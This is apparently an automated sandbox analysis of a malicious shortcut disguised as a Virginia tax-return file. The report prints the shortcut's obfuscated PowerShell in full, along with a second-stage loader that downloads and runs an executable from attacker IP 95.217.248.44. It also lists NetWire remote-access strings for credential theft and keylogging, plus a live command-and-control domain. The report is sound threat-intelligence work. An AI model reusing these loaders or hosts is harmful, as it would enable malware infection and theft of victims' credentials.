File name: | VIRGINIA-TAX-RETURN-2021-US-EXT.lnk |
Full analysis: | https://app.any.run/tasks/ed84025e-17ad-4793-b002-7bb07b92bb86 |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | August 12, 2022, 17:40:06 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/octet-stream |
File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Thu Nov 19 01:50:22 2020, mtime=Thu Aug 11 06:58:46 2022, atime=Thu Nov 19 01:50:22 2020, length=433152, window=hidenormalshowminimized |
MD5: | 0C8C19E19CC4DF9841C0B31BF42297DE |
SHA1: | 078EAB579439EDBCECB86556D14D60404F2F1E3E |
SHA256: | A814641ECE58BA618155C9267474A575A6423B7BD086C7B534E267E40292E2CE |
SSDEEP: | 48:8WnHJfY5217hniLRiLsn048asBxBcBjqdJ94W9k:8kHJfwCnOX048asBxe+9 |
.lnk | | | Windows Shortcut (100) |
---|
MachineID: | desktop-7n4rmrr |
---|---|
IconFileName: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe |
CommandLineArguments: | -ExecutionPolicy UnRestricted $ryrZN='s/L4..4.h4t7t/51p/:9hht82aa2.Mth'; &(-join($ryrZN[(49307-49307),(14885-14860),(-42127+42129)])) _* (-join($ryrZN[(49307-49307),(14885-14860),(-42127+42129)])); _* => (-join($ryrZN[(-14568+14597),(49307-49307),(-33898+33906),(13922-13912),(14885-14860)])); foreach($prnBEcj in @((-22378+22386),(-52582+52592),(42983-42973),(7032-7016),(-60799+60817),(-20075+20076),(33369-33368),(3925-3906),(-11084+11098),(-28689+28693),(17784-17760),(-47470+47485),(-32558+32569),(-3094+3098),(52631-52607),(-2365+2368),(-55643+55666),(-43604+43608),(43856-43853),(2908-2905),(-15756+15757),(-55338+55346),(-24815+24819),(43407-43399),(-32952+32962),(-5600+5625))) {$zIGtAPwN+= $ryrZN[$prnBEcj]}; => $zIGtAPwN; |
RelativePath: | ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
LocalBasePath: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
VolumeLabel: | - |
DriveType: | Fixed Disk |
TargetFileDOSName: | powershell.exe |
HotKey: | (none) |
RunWindow: | Show Minimized No Activate |
IconIndex: | 13 |
TargetFileSize: | 433152 |
ModifyDate: | 2020:11:19 03:50:22+01:00 |
AccessDate: | 2022:08:11 09:58:46+02:00 |
CreateDate: | 2020:11:19 03:50:22+01:00 |
FileAttributes: | Archive |
Flags: | IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3060 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $ryrZN='s/L4..4.h4t7t/51p/:9hht82aa2.Mth'; &(-join($ryrZN[(49307-49307),(14885-14860),(-42127+42129)])) _* (-join($ryrZN[(49307-49307),(14885-14860),(-42127+42129)])); _* => (-join($ryrZN[(-14568+14597),(49307-49307),(-33898+33906),(13922-13912),(14885-14860)])); foreach($prnBEcj in @((-22378+22386),(-52582+52592),(42983-42973),(7032-7016),(-60799+60817),(-20075+20076),(33369-33368),(3925-3906),(-11084+11098),(-28689+28693),(17784-17760),(-47470+47485),(-32558+32569),(-3094+3098),(52631-52607),(-2365+2368),(-55643+55666),(-43604+43608),(43856-43853),(2908-2905),(-15756+15757),(-55338+55346),(-24815+24819),(43407-43399),(-32952+32962),(-5600+5625))) {$zIGtAPwN+= $ryrZN[$prnBEcj]}; => $zIGtAPwN; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Explorer.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
3616 | "C:\Windows\system32\mshta.exe" http://95.217.248.44/h.hta | C:\Windows\system32\mshta.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
2292 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function jZGsaiXMx($xyBOCKhyZPKOGE, $VwGkTkpaqCAI){[IO.File]::WriteAllBytes($xyBOCKhyZPKOGE, $VwGkTkpaqCAI)};function pmTDdXLWdhLK($xyBOCKhyZPKOGE){if($xyBOCKhyZPKOGE.EndsWith((rsATVTUqdVlwTyE @(58453,58507,58515,58515))) -eq $True){rundll32.exe $xyBOCKhyZPKOGE }elseif($xyBOCKhyZPKOGE.EndsWith((rsATVTUqdVlwTyE @(58453,58519,58522,58456))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $xyBOCKhyZPKOGE}else{Start-Process $xyBOCKhyZPKOGE}};function bIWIzNuUvf($VmmDjbnlwsbkVFWhKeUA){$WjfTjNGZLxxXEo = New-Object (rsATVTUqdVlwTyE @(58485,58508,58523,58453,58494,58508,58505,58474,58515,58512,58508,58517,58523));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$VwGkTkpaqCAI = $WjfTjNGZLxxXEo.DownloadData($VmmDjbnlwsbkVFWhKeUA);return $VwGkTkpaqCAI};function rsATVTUqdVlwTyE($zhintux){$LXFcrnRl=58407;$RDPAvImGSUWUNZz=$Null;foreach($vDfgFpzWlaCLM in $zhintux){$RDPAvImGSUWUNZz+=[char]($vDfgFpzWlaCLM-$LXFcrnRl)};return $RDPAvImGSUWUNZz};function Zqrapntth(){$XJfNaPTXZjlYKZLGL = $env:AppData + '\';$rKiFSFUwMlFJUV = $XJfNaPTXZjlYKZLGL + 'IRS-Logo.svg';If(Test-Path -Path $rKiFSFUwMlFJUV){Invoke-Item $rKiFSFUwMlFJUV;}Else{ $pFSiicRZZXlQKwcBjF = bIWIzNuUvf (rsATVTUqdVlwTyE @(58511,58523,58523,58519,58522,58465,58454,58454,58526,58526,58526,58453,58512,58521,58522,58453,58510,58518,58525,58454,58523,58511,58508,58516,58508,58522,58454,58506,58524,58522,58523,58518,58516,58454,58519,58524,58519,58502,58505,58504,58522,58508,58454,58480,58489,58490,58452,58483,58518,58510,58518,58453,58522,58525,58510));jZGsaiXMx $rKiFSFUwMlFJUV $pFSiicRZZXlQKwcBjF;Invoke-Item $rKiFSFUwMlFJUV;};$KACXYAIfQ = $XJfNaPTXZjlYKZLGL + 'c.exe'; if (Test-Path -Path $KACXYAIfQ){pmTDdXLWdhLK $KACXYAIfQ;}Else{ $nbbdERcIDhhQEe = bIWIzNuUvf (rsATVTUqdVlwTyE @(58511,58523,58523,58519,58465,58454,58454,58464,58460,58453,58457,58456,58462,58453,58457,58459,58463,58453,58459,58459,58454,58506,58453,58508,58527,58508));jZGsaiXMx $KACXYAIfQ $nbbdERcIDhhQEe;pmTDdXLWdhLK $KACXYAIfQ;};;;;}Zqrapntth; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
2924 | "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Roaming\IRS-Logo.svg | C:\Program Files\Internet Explorer\iexplore.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
3984 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2924 CREDAT:144385 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
2120 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2924 CREDAT:333057 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
2724 | "C:\Users\admin\AppData\Roaming\c.exe" | C:\Users\admin\AppData\Roaming\c.exe | powershell.exe | ||||||||||||
User: admin Company: Irfan Skiljan Integrity Level: MEDIUM Description: IrfanView 32-bit Version: 4.60.0.0 Modules
NetWire(PID) Process(2724) c.exe Strings (90)GetProcessImageFileNameA Local Disk WinHttpOpen WinHttpGetProxyForUrl WinHttpGetIEProxyConfigForCurrentUser SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ SOFTWARE\Microsoft\Active Setup\Installed Components SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ SOFTWARE\Microsoft\Active Setup\Installed Components\%s StubPath [Esc] [Ctrl+%c] RegisterRawInputDevices GetRawInputData Secur32.dll LsaGetLogonSessionData LsaEnumerateLogonSessions SOFTWARE\Mozilla\%s\ CurrentVersion SOFTWARE\Mozilla\%s\%s\Main Install Directory mozutils.dll mozsqlite3.dll %s\logins.json PK11_GetInternalKeySlot PK11_Authenticate PL_Base64Decode SECITEM_ZfreeItem PK11SDR_Decrypt PK11_FreeSlot NSS_Shutdown sqlite3_open sqlite3_close sqlite3_prepare_v2 sqlite3_step sqlite3_column_text select * from moz_logins hostname <name> <password> POP3 Server POP3 Password IMAP User IMAP Server IMAP Password HTTP User HTTP Server HTTP Password SMTP User SMTP Server SMTP Password EAS User EAS Server URL EAS Password POP3 Server POP3 Password IMAP User IMAP Server IMAP Password HTTP User HTTP Server HTTP Password SMTP User SMTP Server SMTP Password EAS User EAS Server URL EAS Password index.dat vaultcli.dll VaultOpenVault VaultCloseVault VaultGetItem GetModuleFileNameExA GetModuleFileNameExA GetNativeSystemInfo GlobalMemoryStatusEx HARDWARE\DESCRIPTION\System\CentralProcessor\0 Closed Listening... SYN Sent SYN Received Established Fin Wait (1) Fin Wait (2) Close Wait Closing... Last ACK Time Wait Delete TCB Keys RC4_key125d5d50bd35dcebe448a67adb0ffb46 Options Proxy- ActiveX- Startup_name- Install_path- Mutex Credentials PasswordPassword123 HostHostId-%Rand% C2 (1)septton.com:5389 (PID) Process(2724) c.exe Strings (90)GetProcessImageFileNameA Local Disk WinHttpOpen WinHttpGetProxyForUrl WinHttpGetIEProxyConfigForCurrentUser SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ SOFTWARE\Microsoft\Active Setup\Installed Components SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ SOFTWARE\Microsoft\Active Setup\Installed Components\%s StubPath [Esc] [Ctrl+%c] RegisterRawInputDevices GetRawInputData Secur32.dll LsaGetLogonSessionData LsaEnumerateLogonSessions SOFTWARE\Mozilla\%s\ CurrentVersion SOFTWARE\Mozilla\%s\%s\Main Install Directory mozutils.dll mozsqlite3.dll %s\logins.json PK11_GetInternalKeySlot PK11_Authenticate PL_Base64Decode SECITEM_ZfreeItem PK11SDR_Decrypt PK11_FreeSlot NSS_Shutdown sqlite3_open sqlite3_close sqlite3_prepare_v2 sqlite3_step sqlite3_column_text select * from moz_logins hostname <name> <password> POP3 Server POP3 Password IMAP User IMAP Server IMAP Password HTTP User HTTP Server HTTP Password SMTP User SMTP Server SMTP Password EAS User EAS Server URL EAS Password POP3 Server POP3 Password IMAP User IMAP Server IMAP Password HTTP User HTTP Server HTTP Password SMTP User SMTP Server SMTP Password EAS User EAS Server URL EAS Password index.dat vaultcli.dll VaultOpenVault VaultCloseVault VaultGetItem GetModuleFileNameExA GetModuleFileNameExA GetNativeSystemInfo GlobalMemoryStatusEx HARDWARE\DESCRIPTION\System\CentralProcessor\0 Closed Listening... SYN Sent SYN Received Established Fin Wait (1) Fin Wait (2) Close Wait Closing... Last ACK Time Wait Delete TCB Keys RC4_key125d5d50bd35dcebe448a67adb0ffb46 Options Keylogger_directory- Sleep(s)75 Offline_keyloggerfalse Use_a_mutextrue Registry_autorunfalse Lock_executablefalse Delete_originalfalse Copy_executablefalse ProxyDirect_connection ActiveXfalse Startup_name- Install_path- MutexObwQvAVd Credentials PasswordPassword123 HostHostId-uOm8m0 C2 (1)septton.com:5389 |
(PID) Process: | (3060) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (3616) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (3616) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (3616) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (3616) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (3616) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
(PID) Process: | (3616) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
Operation: | write | Name: | SavedLegacySettings |
Value: 460000003C010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A80164000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | |||
(PID) Process: | (3616) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
Operation: | write | Name: | CachePrefix |
Value: | |||
(PID) Process: | (3616) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
(PID) Process: | (3616) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
Operation: | write | Name: | CachePrefix |
Value: Visited: |
PID | Process | Filename | Type | |
---|---|---|---|---|
3060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y67FBDPXM97508D0N7IH.temp | binary | |
MD5:39F4AEF4615885C84D8193E6086A0E82 | SHA256:1247C0245FABAD86455D91830C13989B7402F823162F60BBA43D7FC8D63F53DD | |||
2924 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63 | der | |
MD5:EE87BB11E233C12009CC11725035DBDC | SHA256:D82930A5B051B3C3F1639C24E83BDDF41D5AA66E467A0944D1AC3D59AE6330C5 | |||
3060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4cf1a02c6f2538b1.customDestinations-ms | binary | |
MD5:39F4AEF4615885C84D8193E6086A0E82 | SHA256:1247C0245FABAD86455D91830C13989B7402F823162F60BBA43D7FC8D63F53DD | |||
2924 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | |
MD5:707C24BFB397E919DAC5ADDA1B8DC7C7 | SHA256:E8E645BAEB1F8EB8D3DB1CC508370B3B6864EB75D23AD9010BA75836EB7D2FDE | |||
2292 | powershell.exe | C:\Users\admin\AppData\Roaming\c.exe | executable | |
MD5:01028A50EFA2F9E058F61A39B2B412C9 | SHA256:2FC97A9025F097A4C1040C2A50D644AD2979F56E8CAF337A1A788297F6BE7123 | |||
3060 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
2924 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | image | |
MD5:DA597791BE3B6E732F0BC8B20E38EE62 | SHA256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07 | |||
2292 | powershell.exe | C:\Users\admin\AppData\Roaming\IRS-Logo.svg | image | |
MD5:58004CA86F7B09A95B4C695EB612C01C | SHA256:3536108234988F9FEBFCE80CA86C2FD44ACC995593240C0E9E30399F46B27087 | |||
2924 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | der | |
MD5:290A85BD3E7285CDEDA1602A9E12A7DF | SHA256:17AE86541BE373B2DB8A4B77D7E7626966637E5A6052F290A3B598A56F5123C9 | |||
2924 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | binary | |
MD5:6E595422455D68FF77532BF792D64125 | SHA256:92787CD1C9309C4C802946E2B4AFB76B678CE403486F258152B186578DEBC127 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2292 | powershell.exe | GET | 200 | 95.217.248.44:80 | http://95.217.248.44/c.exe | DE | executable | 2.03 Mb | malicious |
2924 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8Ull8gIGmZT9XHrHiJQeI%3D | US | der | 1.47 Kb | whitelisted |
2924 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | US | der | 471 b | whitelisted |
3616 | mshta.exe | GET | 200 | 95.217.248.44:80 | http://95.217.248.44/h.hta | DE | html | 13.1 Kb | malicious |
2924 | iexplore.exe | GET | 200 | 178.79.242.128:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?317b80eb85edcc72 | DE | compressed | 4.70 Kb | whitelisted |
2924 | iexplore.exe | GET | 200 | 178.79.242.128:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?2c79d80d2d259b37 | DE | compressed | 4.70 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2924 | iexplore.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
3616 | mshta.exe | 95.217.248.44:80 | — | Hetzner Online GmbH | DE | malicious |
2292 | powershell.exe | 95.217.248.44:80 | — | Hetzner Online GmbH | DE | malicious |
2292 | powershell.exe | 23.78.197.214:443 | www.irs.gov | Akamai Technologies, Inc. | US | unknown |
2924 | iexplore.exe | 131.253.33.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
2924 | iexplore.exe | 178.79.242.128:80 | ctldl.windowsupdate.com | Limelight Networks, Inc. | DE | malicious |
2924 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2724 | c.exe | 31.41.244.150:5389 | septton.com | LLC DARNET | RU | malicious |
Domain | IP | Reputation |
---|---|---|
www.irs.gov |
| suspicious |
septton.com |
| malicious |
api.bing.com |
| whitelisted |
www.bing.com |
| whitelisted |
ctldl.windowsupdate.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
iecvlist.microsoft.com |
| whitelisted |
r20swj13mr.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
3616 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
3616 | mshta.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host HTA Request |
3616 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
2292 | powershell.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
2292 | powershell.exe | A Network Trojan was detected | ET TROJAN Single char EXE direct download likely trojan (multiple families) |
2292 | powershell.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
2292 | powershell.exe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |
2292 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2292 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2292 | powershell.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |